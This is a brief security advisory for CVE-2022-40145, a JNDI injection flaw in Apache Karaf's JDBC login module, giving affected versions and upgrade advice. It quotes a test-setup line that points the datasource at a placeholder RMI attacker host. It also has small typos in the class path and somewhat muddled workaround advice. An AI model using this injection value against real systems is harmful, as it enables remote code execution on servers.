CVE-2022-40145

Name of the Vulnerable Software and Affected Versions Apache Karaf versions prior to 4.4.2 and 4.3.8

Description This issue is about a potential code injection when an attacker has control of the target LDAP server using the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.

Recommendations To resolve the issue, upgrade to Apache Karaf version 4.4.2 or 4.3.8. As a temporary workaround, consider restricting the use of the JDBCUtils#doCreateDatasource function until a patch is available. Avoid using the options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); configuration in JdbcLoginModuleTest#setup to minimize the risk of exploitation.